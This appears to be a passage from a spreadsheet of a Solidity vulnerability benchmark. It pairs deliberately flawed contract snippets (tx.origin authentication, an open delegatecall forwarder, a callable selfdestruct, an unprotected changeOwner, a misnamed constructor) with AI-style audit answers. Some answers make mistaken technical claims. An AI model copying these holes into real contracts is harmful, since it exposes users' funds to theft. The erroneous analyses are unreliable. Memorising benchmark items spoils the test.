- Consider using a well-established multi-signature wallet implementation that has undergone rigorous testing and auditing, rather than rolling out your own.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
- The `suicide()` function (also known as `selfdestruct()`) is used. When invoked, it destroys the contract and sends all remaining Ether to the specified address. This function is irreversible and, if misused, can lead to the unintentional destruction of the contract or theft of funds.
- The `sha3()` function (which has been replaced by `keccak256()` in later versions) is used to hash the `msg.data`. This method of verification is not clear in its intention and can be prone to potential misuse or vulnerabilities.
3. The business impact of these vulnerabilities in one sentence: 
The `kill` function leads to the irreversible destruction of the contract and potential loss or theft of funds.
4. The potential solutions of these vulnerabilities:
- Avoid using the `suicide()` or `selfdestruct()` function unless it's necessary and you're certain about its implications. If you must use it, ensure that adequate controls and checks are in place.
- Replace `sha3()` with `keccak256()`, which is the updated and recommended hash function. Also, ensure that the mechanism for verifying ownership or permissions (using `msg.data` in this case) is robust and does not expose the contract to potential misuse or attacks.
- Implement a time lock or a delay on such critical functions, so stakeholders have time to react in case of a malicious intent or mistake.
- Allow for a multi-signature requirement or other forms of consensus before executing critical functions like `kill`.</t>
  </si>
  <si>
    <t>(the same as above)Alright, let's start by reading and understanding the provided Solidity code from the file "parity_wallet_bug_2.sol".
From the provided Solidity code, here's a brief overview:
1. The code starts with a comment section that describes the purpose of the contract: a multi-sig wallet with daily-limited transaction capabilities.
2. The `WalletEvents` contract defines various events that can be emitted by the main wallet contract, such as Confirmation, Revoke, OwnerChanged, RequirementChanged, Deposit, SingleTransact, MultiTransact, and ConfirmationNeeded.
3. The `WalletAbi` contract seems to define an interface, though the content is truncated, so I cannot see the full details.
4. The main contract, which doesn't have a defined name in the provided code, includes several functions and variables related to managing multi-sig operations, changing owners, and managing daily limits.
Now, let's analyze the code for any potential access control vulnerabilities.
1. Are there any access control vulnerabilities?
**Answer**: Yes.
2. how this vulnerability can be exploited :
- The function `execute` seems to have a logic that allows an owner to execute a transaction without requiring multiple confirmations if the transaction value is under the daily limit. This can lead to unauthorized transactions if an owner's private key is compromised.
- The function `underLimit` checks if the daily limit has been exceeded. There's a potential issue here if the daily limit is set to a very high value or if an attacker can manipulate the `m_spentToday` value.
- The contract doesn't have a defined constructor. Without it, there's a risk that important initialization logic (like setting the initial owners or the required number of confirmations for a transaction) might be missed, leading to vulnerabilities.
- There is a constant address `_walletLibrary` that seems to be set to an arbitrary address (`0xcafecafecafecafecafecafecafecafecafecafe`). If this address has any functionality associated with it in the real network, it might pose a security risk.
3. The business impact of these vulnerabilities in one sentence:
- The `execute` function leads to unauthorized transactions under the daily limit without multiple confirmations.
- The `underLimit` function can potentially allow transactions that exceed the intended daily limit.
- The missing constructor can result in uninitialized or misconfigured contract state.
- The arbitrary `_walletLibrary` address can pose unknown risks if associated with any real functionality.
4. The potential solutions of these vulnerabilities:
- For the `execute` function, ensure that all multi-sig requirements are enforced regardless of the transaction value. Alternatively, have stricter rules or alerts for transactions that are near the daily limit.
- For the `underLimit` function, ensure proper validation and checks for overflow and underflow. Use libraries like SafeMath for arithmetic operations.
- Implement a constructor that handles all necessary initializations for the contract.
- Ensure that any hardcoded addresses like `_walletLibrary` are valid, trusted, and serve a clear purpose. Avoid using arbitrary or placeholder addresses</t>
  </si>
  <si>
    <t>1. **Are there any access control vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :** 
   The `kill` function utilizes the `onlymanyowners` modifier to control access. Depending on the implementation of `onlymanyowners`, there may be vulnerabilities. Specifically, if the `onlymanyowners` modifier does not properly restrict access, then unauthorized users may be able to call the `kill` function. The function also relies on `sha3(msg.data)` for some type of validation which could be subject to manipulation depending on the context.
3. **The business impact of these vulnerabilities in one sentence:** 
   Improper use of the `onlymanyowners` modifier and reliance on `sha3(msg.data)` could allow unauthorized users to destroy the contract, leading to potential loss of funds or disruption of service.
4. **The potential solutions of these vulnerabilities:** 
   a. Ensure that the `onlymanyowners` modifier is correctly implemented to require the necessary number of owners' approvals before executing the function.
   b. Consider not using `sha3(msg.data)` for validation or access control, unless it's properly understood and mitigated against potential attacks.
   c. Regularly audit the smart contract to identify and rectify any vulnerabilities or issues.
   d. Limit the use of the `suicide` function in contracts as it permanently destroys the contract. Consider implementing a pause or freeze functionality instead, which can halt operations without destroying the contract.</t>
  </si>
  <si>
    <t xml:space="preserve">  function execute(address _to, uint _value, bytes _data) external onlyowner returns (bytes32 o_hash) {
    if ((_data.length == 0 &amp;&amp; underLimit(_value)) || m_required == 1) {
      address created;
      if (_to == 0) {
        created = create(_value, _data);
      } else {
        if (!_to.call.value(_value)(_data))
          throw;
      }
      SingleTransact(msg.sender, _value, _to, _data, created);
    } else {
      // determine our operation hash.
      o_hash = sha3(msg.data, block.number);
      // store if it's new
      if (m_txs[o_hash].to == 0 &amp;&amp; m_txs[o_hash].value == 0 &amp;&amp; m_txs[o_hash].data.length == 0) {
        m_txs[o_hash].to = _to;
        m_txs[o_hash].value = _value;
        m_txs[o_hash].data = _data;
      }
      if (!confirm(o_hash)) {
        ConfirmationNeeded(o_hash, msg.sender, _value, _to, _data);
      }
    }
  }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
- **Use of `.call.value()`:** The line `if (!_to.call.value(_value)(_data))` uses `.call.value()`, which is vulnerable to reentrancy attacks.
- **Use of `throw`:** The keyword `throw` is deprecated and should be replaced with `revert()`, `require()`, or `assert()`.
- **Use of `sha3`:** The line `o_hash = sha3(msg.data, block.number);` uses the `sha3` function. This function is deprecated and should be replaced with `keccak256`.
3. The business impact of these vulnerabilities in one sentence:
- **Reentrancy attack vulnerability:** The use of `.call.value()` function leads to potential reentrancy attacks, causing funds to be unexpectedly withdrawn.
- **Deprecated throw:** Using `throw` can lead to unexpected contract behavior and increased gas costs.
- **Deprecated sha3:** Using `sha3` can result in unexpected hashing behavior.
4. The potential solutions of these vulnerabilities:
- **For the reentrancy attack vulnerability:** 
  - Implement the Checks-Effects-Interactions pattern, which suggests you should make all the state changes in your contract first, and then call other contracts.
  - Use the `reentrancyGuard` modifier available in OpenZeppelin's library.
- **For the deprecated throw:** Replace `throw` with `revert()`, `require()`, or `assert()`, depending on the desired behavior.
- **For the deprecated sha3:** Replace `sha3` with `keccak256` to ensure consistent hashing behavior.</t>
  </si>
  <si>
    <t>1. **Are there any access control vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
- The function `execute` is marked as `external` and has the modifier `onlyowner`, which is meant to restrict access to only the owner of the contract. However, without seeing the implementation of the `onlyowner` modifier, it's impossible to determine if this modifier effectively restricts access as intended.
- The function directly performs calls with user-specified data using `_to.call.value(_value)(_data)`. This can introduce reentrancy vulnerabilities, especially if there are state changes after the external call.
- The `throw` statement is deprecated in Solidity and should be replaced with `require()`, `assert()`, or `revert()` for clearer error handling.
3. **The business impact of these vulnerabilities in one sentence:** 
The `execute` function leads to potential unauthorized access and reentrancy attacks, which can result in loss of funds or unintended state changes.
4. **The potential solutions of these vulnerabilities:**
- Ensure that the `onlyowner` modifier is correctly implemented and effectively restricts access to only the owner of the contract.
- Replace the `throw` statement with `revert()` or `require()` for clearer and more modern error handling.
- To protect against reentrancy, use the Checks-Effects-Interactions pattern: move the external call (`_to.call.value(_value)(_data)`) to the end of the function after all state changes. Alternatively, use a reentrancy guard to prevent recursive calls.
- Always be cautious about making calls to external addresses with user-specified data, as this can introduce other vulnerabilities beyond reentrancy.
Note: A complete vulnerability assessment would require analyzing the entire contract, especially the `onlyowner` modifier and other related functions.</t>
  </si>
  <si>
    <t>dataset/access_control/phishable.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function withdrawAll(address _recipient) public {
        require(tx.origin == owner);
        _recipient.transfer(this.balance);
    }
}</t>
  </si>
  <si>
    <t>I will first read and analyze the provided Solidity code to determine if there are any vulnerabilities.
After analyzing the provided Solidity code, I can provide the following evaluation:
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - The contract relies on `tx.origin` for authentication in the `withdrawAll` function.
   - The contract uses `this.balance` without checking if the `transfer` function succeeds.
3. **The business impact of these vulnerabilities in one sentence:**
   - Relying on `tx.origin` for authentication can allow malicious contracts to steal funds, and not checking the success of the `transfer` function can lead to lost funds.
4. **The potential solutions of these vulnerabilities:**
   - Replace `tx.origin` with `msg.sender` for authentication checks.
   - Always check the return value of the `transfer` function or use the `send` function followed by a check to ensure that the transfer was successful. Alternatively, consider using the "checks-effects-interactions" pattern to avoid potential reentrancy attacks.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The function uses `tx.origin` for authentication. This is a known security vulnerability in Ethereum. Malicious contracts can abuse this to perform operations as if they were the original sender.
- The function does not check if `_recipient` is a valid address or not, which could lead to accidental loss of funds if an invalid address is passed.
3. The business impact of these vulnerabilities in one sentence:
- The misuse of `tx.origin` for authentication can allow malicious contracts to steal funds, and passing an invalid address can lead to the irreversible loss of funds.
4. The potential solutions of these vulnerabilities:
- Replace `tx.origin` with `msg.sender` to check for the direct caller of the function rather than the origin of the transaction. This prevents malicious contracts from impersonating the owner.
- Add additional checks or validations for the `_recipient` address to ensure that it is a valid and intended Ethereum address before transferring funds.</t>
  </si>
  <si>
    <t>Alright, let's start by reading the content of the uploaded Solidity file so I can analyze it for potential vulnerabilities.
1. Are there any access control vulnerabilities?
**Answer:** Yes.
2. how this vulnerability can be exploited :
- The `withdrawAll` function uses `tx.origin` for access control instead of `msg.sender`.
3. The business impact of these vulnerabilities in one sentence:
- The usage of `tx.origin` for access control allows malicious contracts to bypass owner-only restrictions, potentially leading to unauthorized withdrawal of funds.
4. The potential solutions of these vulnerabilities:
- Replace `tx.origin` with `msg.sender` for access control.
- Implement a robust role-based access control mechanism or utilize the OpenZeppelin's `Ownable` contract for improved security.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
The code uses `tx.origin` to check if the caller is the owner. `tx.origin` can be abused in cases where a malicious contract calls this function indirectly. Specifically, if a contract is called by the owner and that contract subsequently calls `withdrawAll`, `tx.origin` will still be the owner's address.
3. The business impact of these vulnerabilities in one sentence:
The `withdrawAll` function leads to unauthorized withdrawals when the owner interacts with a malicious contract.
4. The potential solutions to these vulnerabilities:
- Replace `tx.origin` with `msg.sender` and use an access control pattern. For instance, you can use modifiers to restrict access:
  ```solidity
  modifier onlyOwner() {
      require(msg.sender == owner, "Not authorized");
      _;
  }
  function withdrawAll(address _recipient) public onlyOwner {
      _recipient.transfer(address(this).balance);
  }
  ```
- Ensure the owner's interactions with other contracts are safe and do not lead to indirect calls to sensitive functions.
- Consider using a well-audited access control library or pattern, like OpenZeppelin's Ownable, to manage ownership and permissions.</t>
  </si>
  <si>
    <t>dataset/access_control/proxy.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function forward(address callee, bytes _data) public {
    require(callee.delegatecall(_data)); 
  }</t>
  </si>
  <si>
    <t>Alright, let me review the code first.
I have reviewed the provided Solidity code. Here's my analysis:
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The primary vulnerability in this contract is the uncontrolled use of the `delegatecall` function within the `forward` function. The `delegatecall` is a low-level function that allows the called contract to execute code in the context of the calling contract. This can lead to unexpected changes to the state variables of the `Proxy` contract if not properly controlled.
For instance, an attacker might call the `forward` function with a malicious contract as the `callee` and data that modifies the `owner` state variable of the `Proxy` contract. If the malicious contract has a function that changes the storage at the slot where the `owner` variable is stored, the attacker can take over the contract.
3. The business impact of these vulnerabilities in one sentence:
The `forward` function leads to potential unauthorized changes in the contract's state.
4. The potential solutions of these vulnerabilities:
- Restrict the use of the `forward` function to only trusted contracts or trusted addresses. One way to achieve this is by maintaining a whitelist of trusted contracts that can be called through the `forward` function.
- Alternatively, avoid using `delegatecall` in this manner. Instead, consider implementing more specific functions that carry out the desired logic without risking the contract's state. If `delegatecall` is essential, be sure to validate the called contract and the data passed to ensure that no unintended changes are made to the contract's state.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `forward` function uses the `delegatecall` method to call a target contract. The vulnerability here is that `delegatecall` allows the called contract to execute its function in the context of the calling contract, meaning it can modify the calling contract's state. This can be especially dangerous if the callee contract is malicious. Essentially, any address provided as the `callee` can run arbitrary code within the context of the contract that contains the `forward` function.
For instance, if a malicious contract has a function that changes ownership, and it's invoked using this `forward` function, it could potentially take over the contract that has the `forward` function.
3. The business impact of these vulnerabilities in one sentence:
The `forward` function leads to potential unauthorized state changes or takeover of the contract.
4. The potential solutions of these vulnerabilities:
- **Restrict Usage**: Only allow trusted contracts to be called using the `forward` function. This could be done by maintaining a whitelist of trusted contracts and checking against this list before making the `delegatecall`.
- **Remove `delegatecall`**: If there's no specific need for `delegatecall`, consider using a regular call. Note that this will change the functionality, so it's essential to ensure it doesn't break desired behavior.
- **Limit State Changes**: Ensure that the state variables that can be changed by the `delegatecall` are minimal and controlled. This might not eliminate the risk but can reduce the potential damage.
- **Auditing &amp; Monitoring**: Regularly audit the contracts to detect any malicious activities. Monitor the usage of the `forward` function to detect suspicious or unauthorized calls.</t>
  </si>
  <si>
    <t>Let's begin by reading and understanding the provided Solidity code from the file `proxy.sol`.
The provided Solidity code describes a simple `Proxy` contract. Here's a breakdown:
1. The contract defines an `owner` state variable.
2. The constructor sets the `owner` to the address that deploys the contract.
3. There's a `forward` function that takes an address (`callee`) and some data (`_data`) and performs a `delegatecall` to the `callee` with the provided `_data`.
Let's analyze the code for the questions provided:
1. Are there any access control vulnerabilities?
**Response:** Yes.
2. how this vulnerability can be exploited :
The `forward` function does not have any access control. Any Ethereum address can call this function and forward a `delegatecall` to any other contract.
3. The business impact of these vulnerabilities in one sentence:
The `forward` function leads to unauthorized execution of functions in other contracts.
4. The potential solutions of this vulnerabilities:
- Implement access controls on the `forward` function to ensure only authorized addresses (e.g., the `owner`) can call it.
- Consider adding event logging to the `forward` function to monitor and log any `delegatecall` actions.
Let's formalize these answers.
1. Are there any access control vulnerabilities?
**Answer:** Yes.
2. how this vulnerability can be exploited :
- Any Ethereum address can call the `forward` function in the `Proxy` contract and issue a `delegatecall` to any other contract using any data payload.
3. The business impact of these vulnerabilities in one sentence:
- The unrestricted `forward` function leads to unauthorized execution of functions in other contracts.
4. The potential solutions of these vulnerabilities:
- Implement access control on the `forward` function to ensure that only the `owner` or authorized addresses can use it.
- Add event logging in the `forward` function to track and log every `delegatecall` made, which aids in monitoring and auditing.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `forward` allows any caller to make a delegate call to any address with any provided data. This means an attacker can exploit this function to call any function of any contract with the current contract's state and privileges.
3. The business impact of these vulnerabilities in one sentence:
The `forward` function leads to potential unauthorized actions or state changes in the contract.
4. The potential solutions for these vulnerabilities:
- Restrict the `forward` function's visibility to only trusted addresses, perhaps by using a modifier that checks the sender's address against a whitelist.
- Remove the `forward` function if it is not necessary for the contract's intended use.
- If using this function is absolutely necessary, ensure strict validation of the `callee` address and the `_data` being passed to prevent unintended or malicious calls.</t>
  </si>
  <si>
    <t>dataset/access_control/rubixi.sol</t>
  </si>
  <si>
    <t xml:space="preserve">         function DynamicPyramid() {
                 creator = msg.sender; 
         }</t>
  </si>
  <si>
    <t>First, I'll read the provided Solidity code to understand its content.
The provided Solidity code appears to be for a contract named "Rubixi." From the initial view:
1. There is a variable declaration section.
2. There's a function named "DynamicPyramid" which seems to be a constructor but does not match the contract name. This mismatch is a potential issue.
3. There's a modifier called "onlyowner."
4. A struct named "Participant" is defined.
5. A fallback function is provided which calls the "init" function.
6. The "init" function ensures that transactions with a value of less than 1 ether are not processed and instead collected as fees. It also gives a fee rebate for transactions of 50 ether or more.
7. The "addPayout" function seems to add a new address to the participant array and adjusts the pyramid multiplier based on the number of participants.
To provide a thorough analysis, I'll need to see more of the code. However, based on the initial view, I've identified at least one potential vulnerability related to the constructor. Let's proceed with a deeper analysis.
### Analysis
1. **Constructor Mismatch Vulnerability**: Solidity contracts have a special function called the constructor, which is executed once and only once, at the time the contract is created. The constructor function used to have the same name as the contract. In the provided code, the function `DynamicPyramid` appears to be intended as the constructor for the `Rubixi` contract. However, its name does not match the contract's name. As a result, it won't be treated as a constructor. Instead, it will be treated as a regular public function, which means anyone can call it and change the `creator` address.
### Responses
1. Are there any vulnerabilities?
   - **Yes**.
2. how this vulnerability can be exploited :
   - **Constructor Mismatch Vulnerability**: Anyone can call the `DynamicPyramid` function after the contract deployment and change the `creator` address.
3. The business impact of these vulnerabilities in one sentence:
   - **Constructor Mismatch Vulnerability**: The unintended public `DynamicPyramid` function leads to potential unauthorized changes in contract ownership.
4. The potential solutions to these vulnerabilities:
   - **Constructor Mismatch Vulnerability**: 
     - Rename the `DynamicPyramid` function to `constructor` and use the `constructor` keyword (introduced in later Solidity versions) to ensure it's only executed during contract creation.
     - Ensure the visibility of the constructor is set to `public`.
     - Remove any custom name constructors from the contract to avoid confusion.
I would recommend reviewing the entire code to ensure there are no additional vulnerabilities.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `DynamicPyramid` function is likely intended as a constructor for a contract, but it's named incorrectly. In Solidity version 0.4.x, the constructor function should have the same name as the contract. If the contract name is also `DynamicPyramid`, then the function is intended as the constructor. If the Solidity version is greater than or equal to 0.5.x, then the `constructor` keyword should be used instead of the function name to declare a constructor.
The vulnerability here is that if someone notices this incorrect naming, they can call the `DynamicPyramid` function after the contract is deployed, potentially altering the `creator` variable, which could lead to unauthorized control or actions if `creator` is used for privilege checks.
3. The business impact of these vulnerabilities in one sentence:
**Misnamed constructor function leads to potential unauthorized control or actions.**
4. The potential solutions of these vulnerabilities:
- If the Solidity version is 0.4.x, ensure the contract name is the same as the constructor function name.
- If the Solidity version is 0.5.x or above, replace the `DynamicPyramid` function name with the `constructor` keyword.
- Make sure to include the `public` or `internal` visibility specifier explicitly with the constructor to avoid confusion.
- After making changes, thoroughly test the contract to ensure the constructor behavior is correct and can't be called after the contract's deployment.</t>
  </si>
  <si>
    <t>Alright, let me first review the provided Solidity code file to understand its structure and operations. After that, I'll proceed to answer your questions.
Upon initial inspection of the code, here's a summary:
- The contract is named "Rubixi."
- It declares a number of private state variables like balance, collectedFees, feePercent, etc.
- There's an address variable named "creator."
- A function named "DynamicPyramid" is defined which sets the creator to the message sender.
- A modifier "onlyowner" is defined to restrict certain functions to be only callable by the contract creator.
- A struct "Participant" is defined with an address and a payout.
- A fallback function is defined which calls an "init" function.
- The "init" function checks if the message value is less than 1 ether and seems to have further logic (which is not fully visible in the displayed part).
To comprehensively analyze access control vulnerabilities, I'll need to further inspect the rest of the code, especially functions that modify state variables or perform critical operations. Let's continue to analyze the entire code.
The functions and modifiers present in the contract "Rubixi" are:
1. DynamicPyramid (Function)
2. onlyowner (Modifier)
3. function (This seems to be an anomaly, possibly a parsing error or an issue in the code)
4. run (Function)
5. init (Function)
6. addPayout (Function)
7. collectAllFees (Function)
8. collectFeesInEther (Function)
9. collectPercentOfFees (Function)
10. changeOwner (Function)
11. changeMultiplier (Function)
12. changeFeePercentage (Function)
13. currentMultiplier (Function)
14. currentFeePercentage (Function)
15. currentPyramidBalanceApproximately (Function)
16. nextPayoutWhenPyramidBalanceTotalsApproximately (Function)
17. feesSeperateFromBalanceApproximately (Function)
18. totalParticipants (Function)
19. numberOfParticipantsWaitingForPayout (Function)
20. participantDetails (Function)
I'll continue to analyze these functions, especially those that seem to modify the state of the contract or have restricted access. This will allow me to identify any potential access control vulnerabilities.
It seems I made an error in extracting the contents of the functions that could have potential access control vulnerabilities. Let me correct that and extract the contents of the suspicious functions again.
Based on the extracted content of the suspicious functions, let's analyze them for access control vulnerabilities:
1. **onlyowner Modifier**:
   - This modifier is designed to ensure that only the contract creator (`creator`) can execute certain functions.
   - Code: `if (msg.sender == creator) _;`
2. **collectAllFees Function**:
   - Transfers all collected fees to the creator.
   - Code:
     ```solidity
     if (collectedFees == 0) throw;
     creator.send(collectedFees);
     collectedFees = 0;
     ```
3. **changeOwner Function**:
   - Changes the contract owner (`creator`).
   - Code: `creator = _owner;`
4. **changeMultiplier Function**:
   - Changes the pyramid multiplier.
   - Code:
     ```solidity
     if (_mult &gt; 300 || _mult &lt; 120) throw;
     pyramidMultiplier = _mult;
     ```
5. **changeFeePercentage Function**:
   - Changes the fee percentage.
   - Code:
     ```solidity
     if (_fee &gt; 10) throw;
     feePercent = _fee;
     ```
From the above analysis, the critical question is: Are these functions restricted to be callable only by the contract creator? If they are not restricted, they pose access control vulnerabilities.
Let's proceed to answer your questions based on the above analysis.
1. Are there any access control vulnerabilities?
   **Answer**: Yes.
2. how this vulnerability can be exploited :
   a. **onlyowner Modifier**: This modifier only checks if the sender is the creator but doesn't revert the transaction if the check fails. This means that any subsequent operations in functions using this modifier will proceed even if the sender isn't the creator.
   b. **collectAllFees Function**: If this function isn't restricted using the `onlyowner` modifier or a similar access control mechanism, any user can call this function to transfer all the collected fees to the creator.
   c. **changeOwner Function**: Without proper access control, any user can change the contract's owner (`creator`).
   d. **changeMultiplier Function**: If unrestricted, any user can change the pyramid multiplier within the specified bounds.
   e. **changeFeePercentage Function**: Any user can change the fee percentage within the specified bounds if there isn't proper access control.
3. The business impact of these vulnerabilities in one sentence:
   Unauthorized changes to contract settings or theft of funds due to inadequate access control can lead to financial losses and trust erosion among participants.
4. The potential solutions to these vulnerabilities:
   a. **onlyowner Modifier**: Modify the `onlyowner` modifier to include a `revert` or `throw` statement if the sender isn't the creator.
   ```solidity
   modifier onlyowner {
       require(msg.sender == creator, "Only the creator can call this function.");
       _;
   }
   ```
   b. **collectAllFees, changeOwner, changeMultiplier, and changeFeePercentage Functions**: Ensure that each of these functions uses the `onlyowner` modifier (or a similar access control mechanism) to restrict access. For example:
   ```solidity
   function collectAllFees() onlyowner {...}
   function changeOwner(address _newOwner) onlyowner {...}
   ```
   c. Always test the contract in a safe environment before deploying it on the mainnet to ensure that all access control mechanisms work as intended.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `DynamicPyramid` is not marked with any visibility specifier. In Solidity, the default function visibility is `public`, which means that any external account or contract can call this function. This can lead to unintended reassignments of the `creator` variable if it's callable multiple times after the initial deployment.
3. The business impact of these vulnerabilities in one sentence:
The `DynamicPyramid` function leads to potential unauthorized overwriting of the `creator` variable.
4. The potential solutions of these vulnerabilities:
- Make the `DynamicPyramid` function `internal` or `private` if it is only meant to be called within the contract.
- If this is meant to be a constructor (which initializes a contract), it should be declared with the `constructor` keyword to ensure it's called only once when the contract is deployed. This will prevent multiple reassignments of the `creator` variable.
- Alternatively, if multiple calls are expected but with restricted access, implement an access control mechanism (e.g., using `require` statements) to check the caller's address or use a modifier to restrict who can call the function.</t>
  </si>
  <si>
    <t>dataset/access_control/simple_suicide.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function sudicideAnyone() {
    selfdestruct(msg.sender);
  }</t>
  </si>
  <si>
    <t>I'll start by reading the contents of the provided Solidity file to understand its structure and functionality.
I have analyzed the code. Here's the breakdown:
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `sudicideAnyone` function allows any caller to trigger the `selfdestruct` function with `msg.sender` as the recipient. This means any user can destroy the contract and claim any remaining Ether balance to their address.
3. The business impact of these vulnerabilities in one sentence:
The `sudicideAnyone` function leads to unauthorized destruction of the contract and potential loss of Ether.
4. The potential solutions of these vulnerabilities:
- Remove the `sudicideAnyone` function if it's not necessary.
- If the function is required, implement an access control mechanism (e.g., only allow the contract owner to call this function).
Note: The spelling mistake "sudicideAnyone" should be corrected to "suicideAnyone" for clarity, though this is not related to the vulnerability.</t>
  </si>
  <si>
    <t>1. **Are there any vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :** 
The function `sudicideAnyone()` allows any address (including potential adversaries) to call it and destroy the contract by sending all its Ether balance to the caller's address.
3. **The business impact of these vulnerabilities in one sentence:** 
The `sudicideAnyone()` function leads to potential loss of all funds in the contract and permanent destruction of the contract.
4. **The potential solutions of these vulnerabilities:** 
- Restrict access to the `selfdestruct` function by using access control mechanisms like `onlyOwner` or other modifiers to ensure only authorized parties can call it.
- Rename the function to something less suggestive to avoid misuse.
- Completely remove the function if it's not required for the contract's functionality.</t>
  </si>
  <si>
    <t>I will begin by reading the contents of the provided Solidity code file.
Thank you for providing the code. Here's the analysis:
1. Are there any access control vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
The function `sudicideAnyone()` allows any user to call it and trigger the `selfdestruct` operation with the `msg.sender` as the recipient. The `selfdestruct` operation will destroy the contract and send its remaining Ether balance to the specified address (`msg.sender` in this case). 
3. The business impact of these vulnerabilities in one sentence: 
The `sudicideAnyone` function leads to the potential destruction of the contract and loss of its funds to any external user.
4. The potential solutions of these vulnerabilities:
- Restrict access to the `sudicideAnyone()` function to only authorized users, such as the contract owner, by using a modifier.
- Consider using a safer method of transferring funds or updating state without destroying the contract, especially if there's no specific need for the contract to be destroyed.
- If self-destruction is necessary, ensure proper access controls are in place, and possibly require multi-signature confirmations before the operation can proceed.
Note: The function name seems to have a typo "sudicideAnyone" instead of "suicideAnyone", but the analysis is based on the provided code.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `sudicideAnyone` allows any external entity (address) to call it and trigger the `selfdestruct` function, sending the contract's balance to the caller's address. This can be exploited by anyone, not just the contract's owner or a specific set of users.
3. The business impact of these vulnerabilities in one sentence:
The `sudicideAnyone` function leads to potential loss of all contract funds and permanent destruction of the contract.
4. The potential solutions to these vulnerabilities:
- **Restrict Access:** Make sure that only the contract owner or a specific set of authorized users can call such critical functions. This can be achieved by using modifiers like `onlyOwner` or similar.
  ```solidity
  modifier onlyOwner() {
      require(msg.sender == owner, "Not authorized");
      _;
  }
  function sudicideAnyone() onlyOwner {
      selfdestruct(msg.sender);
  }
  ```
- **Name Convention:** Avoid using names that can be misleading. The name `sudicideAnyone` suggests that anyone can destroy the contract, which is a significant risk. Always use naming conventions that clearly communicate the purpose and restrictions of functions.
- **Remove the Function:** If there's no valid use case for such a function in the contract, it's best to remove it altogether to avoid unintentional misuse or exploitation.</t>
  </si>
  <si>
    <t>dataset/access_control/unprotected0.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function changeOwner(address _newOwner)
         public
     {
        owner = _newOwner;
     }</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the uploaded Solidity code to check for vulnerabilities.
1. Are there any vulnerabilities?
Answer: **Yes**
2. how this vulnerability can be exploited :
The function `changeOwner(address _newOwner)` allows any user to change the ownership of the contract without any restrictions.
3. The business impact of these vulnerabilities in one sentence:
The `changeOwner` function leads to unauthorized takeover of the contract's ownership.
4. The potential solutions of these vulnerabilities:
- Implement the `onlyowner` modifier for the `changeOwner` function to ensure that only the current owner can change the contract's ownership.
- As seen in the commented code, the `changeOwner_fixed` function is a potential solution. Uncomment this function and ensure its usage over the unprotected version.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `changeOwner` function doesn't have any access control or restrictions. Any Ethereum address can call this function and change the `owner` address to any other address, including their own.
3. The business impact of these vulnerabilities in one sentence:
Unrestricted access to the `changeOwner` function leads to potential takeover of contract ownership.
4. The potential solutions to these vulnerabilities:
- Add a `require` statement to ensure that only the current owner can change ownership. This would look something like:
  ```solidity
  require(msg.sender == owner, "Not authorized");
  ```
  This ensures that only the current owner can change the owner to a new address.
- Another more robust solution would be to use the OpenZeppelin's `Ownable` contract which provides a tested implementation of this ownership pattern. Using tried-and-tested libraries like OpenZeppelin reduces the chances of such vulnerabilities.</t>
  </si>
  <si>
    <t>Let's begin by reading the provided Solidity code to understand its structure and functionalities.
1. **Are there any access control vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The `changeOwner` function allows any address to change the ownership of the contract. There's no access control applied to this function, which means any external account can call this function and take control of the contract.
3. **The business impact of these vulnerabilities in one sentence:**
   The `changeOwner` function leads to unauthorized ownership transfer.
4. **The potential solutions of this vulnerability:**
   - Apply the `onlyowner` modifier to the `changeOwner` function to ensure that only the current owner can change the ownership.
   - It appears there's a commented-out function `changeOwner_fixed` that has the `onlyowner` modifier applied. Uncommenting and using this function in place of the current `changeOwner` function would mitigate this vulnerability.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
   **Yes.**
2. how this vulnerability can be exploited :
   Any user, regardless of their role or permissions, can call the `changeOwner` function and change the `owner` of the contract to any address they choose.
3. The business impact of these vulnerabilities in one sentence:
   The `changeOwner` function leads to unauthorized takeover of contract ownership.
4. The potential solutions for these vulnerabilities:
   - Implement a modifier that ensures only the current `owner` can change the ownership.
   - Use the `onlyOwner` modifier before the function to ensure that only the current owner can call this function.
   - Add an event to log the change of ownership for transparency and traceability. 
Here's a suggested modification to the function:
```solidity
modifier onlyOwner() {
    require(msg.sender == owner, "Not authorized");
    _;
}
function changeOwner(address _newOwner) public onlyOwner {
    require(_newOwner != address(0), "Invalid address");
    owner = _newOwner;
    emit OwnershipTransferred(msg.sender, _newOwner);
}
```
In this solution, only the current owner can change the ownership, and an event `OwnershipTransferred` will log the change, providing transparency.</t>
  </si>
  <si>
    <t>dataset/access_control/wallet_02_refund_nosub.sol</t>
  </si>
  <si>
    <t xml:space="preserve"> function refund() public {
         msg.sender.transfer(balances[msg.sender]);
     }</t>
  </si>
  <si>
